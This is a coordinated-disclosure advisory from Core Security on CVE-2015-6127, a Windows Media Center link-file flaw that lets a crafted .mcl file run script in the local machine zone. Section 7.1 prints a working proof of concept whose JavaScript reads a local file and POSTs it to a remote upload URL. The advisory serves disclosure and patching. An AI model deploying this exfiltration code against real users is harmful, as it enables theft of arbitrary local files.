[CORE-2015-0014] - Microsoft Windows Media Center link file incorrectly resolved reference

[CORE Advisories Team <advisories@xxxxxxxxxxxxxxxx>]

1. Advisory Information

Title: Microsoft Windows Media Center link file incorrectly resolved reference
Advisory ID: CORE-2015-0014
Advisory URL: 
http://www.coresecurity.com/advisories/microsoft-windows-media-center-link-file-incorrectly-resolved-reference
Date published: 2015-12-08
Date of last update: 2015-12-04
Vendors contacted: Microsoft
Release mode: Coordinated release

2. Vulnerability Information

Class: Use of Incorrectly-Resolved Name or Reference [CWE-706]
Impact: Information leak
Remotely Exploitable: No
Locally Exploitable: Yes
CVE Name: CVE-2015-6127

 

3. Vulnerability Description

The 'application' tag in Microsoft [1] Windows Media Center link files (.mcl 
extension) can include a 'run' parameter, which indicates the path of a file to 
be launched when opening the MCL file, or a 'url' parameter, which indicates 
the URL of a web page to be loaded within the Media Center's embedded web 
browser.

A specially crafted MCL file having said 'url' parameter pointing to the MCL 
file itself can trick Windows Media Center into rendering the very same MCL 
file as a local HTML file within the Media Center's embedded web browser.

4. Vulnerable Packages

Windows 7 for x64-based Systems Service Pack 1 (with Internet Explorer 11 
installed)
Other versions are probably affected too, but they were not checked.

5. Vendor Information, Solutions and Workarounds

Microsoft posted the following Security Bulletin: MS15-134 [2]

6. Credits

This vulnerability was discovered and researched by Francisco Falcon from Core 
Exploits Team. The publication of this advisory was coordinated by Joaquín 
Rodríguez Varela from the Core Advisories Team.

 

7. Technical Description / Proof of Concept Code

The ehexthost.exe binary, part of Windows Media Center, loads the given URL 
into an embedded instance of Internet Explorer running in the local machine 
zone, but it doesn't opt-in for the FEATURE_LOCALMACHINE_LOCKDOWN IE security 
feature, therefore this situation can be leveraged by an attacker to read and 
exfiltrate arbitrary files from a victim's local filesystem by convincing him 
to open a malicious MCL file.

The proof-of-concept shows an MCL file with embedded HTML + JS code, 
referencing itself in the 'url' parameter. Unlike what happens when loading a 
local HTML file into Internet Explorer 11, the JS code included here will 
automatically run with no prompts, and it will be able to read arbitrary local 
files using the MSXML2.XMLHTTP ActiveX object. Those read files then can be 
uploaded to an arbitrary remote web server.

Also note that, in order for the PoC to work, the value of the 'url' parameter 
must match the name of the MCL file.

7.1. Proof of Concept

A new file should be created with the name "poc-microsoft.mcl" and with the 
following content:

 
<application url="poc-microsoft.mcl"
name="Showcase"
bgcolor="RGB(255,255,255)"
sharedviewport="false">
<html>
<head>
<meta http-equiv="x-ua-compatible" content="IE=edge" >
</head>
<body>
<script type="text/javascript">

    function do_upload(fname, data){
        var xmlhttp = new XMLHttpRequest();
        xmlhttp.open("POST", "http://192.168.1.50/uploadfile.php";, true);
        xmlhttp.setRequestHeader("Content-type", "multipart/form-data");
        xmlhttp.setRequestHeader("Connection", "close");
        xmlhttp.onreadystatechange = function(){if (xmlhttp.readyState == 
4){alert(fname + " done.");}}
        xmlhttp.send(new Uint8Array(data));
    }


    function read_local_file(filename){
        /* Must use this one, XMLHttpRequest() doesn't allow to read local 
files */
        var xmlhttp = new ActiveXObject("MSXML2.XMLHTTP");
        xmlhttp.open("GET", filename, false);
        xmlhttp.send();
        return xmlhttp.responseBody.toArray();
    }


    function upload_file(filename){
        try{
            do_upload(filename, read_local_file(filename));
        }catch(e){
            alert(filename + " error: " + e);
        }
    }


    upload_file("file:///C:/Windows/System32/calc.exe");

</script>
</body>
</html>

</application>
     
 

8. Report Timeline

2015-09-24: Core Security sent the first notification to Microsoft.
2015-09-24: Microsoft acknowledged receipt of the email and requested a draft 
version of the advisory.
2015-09-25: Core Security sent Microsoft the draft version of the advisory 
including a PoC.
2015-09-25: Microsoft cased the report under MSRC 31305.
2015-10-02: Core Security requested Microsoft provide a status update and 
confirmation of the reported bug.
2015-10-02: Microsoft informed Core Security that they were able to reproduce 
the issue. They were still reviewing it to determine if they would address it 
in a security release.
2015-10-07: Core Security requested Microsoft let us know once they made a 
decision.
2015-10-08: Microsoft informed Core Security they would keep us updated.
2015-10-26: Core Security asked Microsoft if there were any updates regarding 
the reported bug and if they had an estimated time of availability.
2015-10-27: Microsoft informed Core Security that they would be pursuing a fix 
for the reported issue and are working on a release date for it.
2015-11-05: Core Security asked Microsoft if they had determined a release date 
for the fix and a CVE ID to the reported vulnerability.
2015-11-10: Microsoft informed Core Security that they were targeting the 
security fix for this issue in their December release. They also informed us 
that they assigned CVE-2015-6127 to this case.
2015-11-11: Core Security thanked Microsoft for their reply and clarified that 
we would be publishing the advisory on Tuesday, the 8 of December, 2015.
2015-11-12: Microsoft requested from Core Security the link where the advisory 
would be published and the name of the researcher that should appear in the 
acknowledgment.
2015-11-13: Core Security informed Microsoft of the link and name that should 
appear in the acknowledgment.
2015-11-16: Microsoft informed Core Security that they updated the CVE 
acknowledgment accordingly.
2015-12-08: Advisory CORE-2015-0014 published.
9. References

[1] http://www.microsoft.com/. 
[2] https://technet.microsoft.com/library/security/MS15-134.

10. About CoreLabs

CoreLabs, the research center of Core Security, is charged with anticipating 
the future needs and requirements for information security technologies. We 
conduct our research in several important areas of computer security including 
system vulnerabilities, cyber attack planning and simulation, source code 
auditing, and cryptography. Our results include problem formalization, 
identification of vulnerabilities, novel solutions and prototypes for new 
technologies. CoreLabs regularly publishes security advisories, technical 
papers, project information and shared software tools for public use at: 
http://corelabs.coresecurity.com.

11. About Core Security

Core Security enables organizations to get ahead of threats with security test 
and measurement solutions that continuously identify and demonstrate real-world 
exposures to their most critical assets. Our customers can gain real visibility 
into their security standing, real validation of their security controls, and 
real metrics to more effectively secure their organizations.

Core Security's software solutions build on over a decade of trusted research 
and leading-edge threat expertise from the company's Security Consulting 
Services, CoreLabs and Engineering groups. Core Security can be reached at +1 
(617) 399-6980 or on the Web at: http://www.coresecurity.com.

12. Disclaimer

The contents of this advisory are copyright (c) 2015 Core Security and (c) 2015 
CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial 
Share-Alike 3.0 (United States) License: 
http://creativecommons.org/licenses/by-nc-sa/3.0/us/

13. PGP/GPG Keys

This advisory has been signed with the GPG key of Core Security advisories 
team, which is available for download at 
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.